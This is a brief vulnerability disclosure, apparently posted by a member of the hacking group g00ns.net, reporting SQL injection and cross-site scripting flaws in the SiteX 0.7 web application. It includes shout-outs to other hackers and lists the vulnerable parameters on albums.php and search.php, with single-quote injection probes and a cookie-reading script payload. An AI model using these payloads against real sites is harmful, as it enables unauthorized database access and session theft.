I MurderSkillz from g00ns.net have found xss and possible SQL injection vulnerabilities in SiteX 0.7 (and possibly other versions).
Shouts to z3r0, neX, uid0 (exploitercode.com), Zodiac, Wicked, and all the other I may have forgot..
Once again..g00ns.net fucking owns j00!

SQL injection
albums.php
?albumid=20&page='
---------
search.php
?type=photo_keyword&search=2006&page='
---------

XSS
search.php
?type=photo_keyword&search=<script>alert(document.cookie);</script>